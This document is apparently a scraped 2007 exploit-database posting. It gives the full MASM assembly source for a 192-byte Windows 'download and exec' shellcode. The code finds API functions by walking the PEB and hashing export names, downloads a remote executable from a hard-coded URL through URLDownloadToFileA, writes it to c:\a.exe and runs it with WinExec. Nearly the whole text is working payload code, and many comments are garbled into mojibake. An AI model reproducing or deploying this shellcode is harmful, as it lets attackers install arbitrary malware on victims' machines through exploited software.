win32 Tiny Download and Exec Shellcode 192 bytes by h3m4n

VIEWS: 35 PAGES: 3

									                              win32 Tiny Download and Exec Shellcode 192 bytes                                    Page 1/3
  1    ;Tiny Download&&Exec ShellCode codz czy 2007.6.1
  2    ;header 163=61(16+8+9+(28))+95(68+27)+17
  3    ;163+19=192
  4    comment %
  5                     #−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−#               #
  6                   # Tiny Download&&Exec ShellCode−−>         #           #
  7                #     −−>size 192                                 #   #
  8              #                       2007.06.01                    #
  9                #                     codz: czy                   #   #
  10               #                   www.ph4nt0m.org             #       #
  11                 #−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−#            #
  12
  13   system :test on ie6+XPSP2/2003SP2/2kSP4
  14   %
  15   .586
  16   .model flat,stdcall
  17   option casemap:none
  18
  19   include      c:\masm32\include\windows.inc
  20   include      c:\masm32\include\kernel32.inc
  21   includelib   c:\masm32\lib\kernel32.lib
  22   include      c:\masm32\include\user32.inc
  23   includelib   c:\masm32\lib\user32.lib
  24
  25
  26   .data
  27   shelldatabuffer db 1024 dup(0)
  28   shellcodebuffer db 2046 dup(0)
  29   downshell        db ’down exploit’,0
  30   .code
  31   start:
  32           invoke MessageBoxA,0,offset downshell,offset downshell,1
  33           invoke RtlMoveMemory,offset shellcodebuffer,00401040H,256
  34           mov      eax,offset shellcodebuffer
  35           jmp      eax
  36           somenops db 90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h
  37   ;ÃM−^CÂM−^IÃM−^CÂM−^OÃM−^CÂM−^CÃM−^C¦ÃM−^BµÃM−^CÂM−^DÃM−^B´ÃM−^CºÃM−^CÂM−^BÃM−^C«ÃM−^CÂM−^JÃM−^CÂM−^GÃM−^B°Ã
       M−^CÂM−^QÃM−^CÂM−^TÃM−^CÂM−^ZÃM−^B´ÃM−^CºÃM−^CÂM−^BÃM−^C«ÃM−^B¶ÃM−^CÂM−^NÃM−^CÂM−^VÃM−^CÂM−^PÃM−^BµÃM−^CÂM−^Dshe
       llcodeÃM−^CÂM−^RÃM−^CÂM−^FÃM−^B¶ÃM−^B¯ÃM−^CÂM−^JÃM−^C½ÃM−^B¾ÃM−^CÂM−^]ÃM−^B¶ÃM−^CÂM−^NÃM−^CÂM−^VÃM−^CÂM−^PÃM−^CÂ
       M−^VÃM−^B´ÃM−^CÂM−^PÃM−^CÂM−^PÃM−^B£ÃM−^B¬ÃM−^CÂM−^DÃM−^B£ÃM−^CÂM−^DÃM−^C¢ÃM−^CÂM−^UÃM−^C¦ÃM−^CÂM−^JÃM−^BµÃ
       M−^BµÃM−^CÂM−^DshellcodeÃM−^CÂM−^VÃM−^B´ÃM−^CÂM−^PÃM−^CÂM−^PÃM−^B»ÃM−^B•ÃM−^B¾ÃM−^B³
  38   @@shellcodebegin:
  39           call     @@beginaddr
  40   @@beginaddr:
  41           PUSH 03H       ;ÃM−^CÂM−^RÃM−^BªÃM−^BµÃM−^C•ÃM−^CÂM−^SÃM−^CÂM−^CÃM−^BµÃM−^CÂM−^DAPIÃM−^BºÃM−^B¯ÃM−^CÂ
       M−^JÃM−^C½ÃM−^B¸ÃM−^C¶ÃM−^CÂM−^JÃM−^C½
  42           jmp      @@realshellcode
  43   myExitProcess      dd 073e2d87eh
  44   myWinExec          dd 00e8afe98h
  45   myLoadLibraryA     dd 0ec0e4e8eh
  46   dll                db ’URLMON’,0,0
  47   myUrlDownFile      dd 0702f1a36h
czy                                                                                                                06/27/2007
                             win32 Tiny Download and Exec Shellcode 192 bytes                                     Page 2/3
  48   path              db ’c:\a.exe’,0
  49   url               db ’http://www.ph4nt0m.org/a.exe’,0
  50
  51
  52
  53   @@realshellcode:
  54       POP ECX
  55       POP EDI
  56       SCASD ;edi+4
  57   ;ÃM−^BµÃM−^CÂM−^CÃM−^BµÃM−^B½kernel32.dllÃM−^B»ÃM−^C¹ÃM−^BµÃM−^CÂM−^XÃM−^CÂM−^VÃM−^B•
  58   db 67h,64h,0A1h,30h,00h
  59            mov eax, [eax+0cH]
  60            mov esi, [eax+1cH]
  61        lodsd
  62            mov ebp, [eax+08H]         ;EBPÃM−^CÂM−^VÃM−^CÂM−^PÃM−^B´ÃM−^C¦ÃM−^B•ÃM−^CÂM−^Ekernel32.dllÃM−^BµÃM−^CÂ
       M−^DÃM−^B»ÃM−^C¹ÃM−^BµÃM−^CÂM−^XÃM−^CÂM−^VÃM−^B•
  63   ;ÃM−^B´ÃM−^B¦ÃM−^CÂM−^@ÃM−^CÂ-ÃM−^BµÃM−^B¼ÃM−^B³ÃM−^C¶ÃM−^B±ÃM−^CÂ-
  64   @@next2:
  65   PUSH       ECX
  66   @@next3:
  67   MOV        ESI,[EBP+3Ch]
  68   MOV        ESI,[EBP+ESI+78h]
  69   ADD        ESI,EBP
  70   PUSH       ESI
  71   MOV        ESI,[ESI+20h]
  72   ADD        ESI,EBP
  73   XOR        ECX,ECX
  74   DEC        ECX
  75   @@next:
  76   INC        ECX
  77   LODSD
  78   ADD        EAX,EBP
  79   XOR        EBX,EBX
  80   @@again:
  81        MOVSX     EDX,BYTE PTR [EAX]
  82       CMP        DL,DH
  83       JZ         @@end
  84       ROR        EBX,0Dh
  85       ADD        EBX,EDX
  86       INC        EAX
  87       JMP        @@again
  88   @@end:
  89   CMP        EBX,[EDI]
  90   JNZ        @@next
  91
  92   POP      ESI
  93   MOV      EBX,[ESI+24h]
  94   ADD      EBX,EBP
  95   MOV      CX,WORD PTR [ECX*2+EBX]
  96   MOV      EBX,[ESI+1Ch]
  97   ADD      EBX,EBP
  98   MOV      EAX,[ECX*4+EBX]
czy                                                                                                                06/27/2007
                               win32 Tiny Download and Exec Shellcode 192 bytes                                    Page 3/3
  99    ADD       EAX,EBP
  100   STOSD
  101   POP       ECX
  102   loop @@next2
  103
  104   mov ecx,[edi]   ;2
  105   cmp cl,’c’      ;3
  106   jz @@downfile   ;2
  107   PUSH EDI
  108   CALL EAX        ;2
  109   xchg eax,ebp
  110   scasd
  111   scasd
  112   push 01         ;2ÃM−^BµÃM−^CÂM−^ZÃM−^B¶ÃM−^C¾ÃM−^B¸ÃM−^C¶DLLÃM−^BµÃM−^CÂM−^DÃM−^BºÃM−^B¯ÃM−^CÂM−^JÃM−^C½Ã
        M−^B¸ÃM−^C¶ÃM−^CÂM−^JÃM−^C½
  113   jmp @@next3     ;2
  114                   ;ÃM−^CÂM−^WÃM−^CÂM−^\ÃM−^B¼ÃM−^CÂM−^F17
  115
  116
  117   @@downfile:
  118
  119           push    edx    ;0
  120           push    edx    ;0
  121           push    edi    ;file=c:\a.exe
  122           lea     ecx,   dword ptr [edi+9h]
  123           push    ecx    ;url
  124           push    edx    ;0
  125           call    eax    ;URLDownloadToFileA,0,url,file=c:\a.exe,0,0
  126
  127
  128           push 1 ;FOR TEST
  129           push edi
  130           call dword ptr [edi−14H] ;winexec,’c:\xxx.exe’,1
  131
  132       call dword ptr [edi−18H] ;Exitprocess
  133
  134       somenops2 db 90h,90h,90h,90h,90h,90h,90h,90h,90h
  135       invoke ExitProcess,0
  136   end start
  137
  138   ; milw0rm.com [2007−06−27]




czy                                                                                                                 06/27/2007

								
To top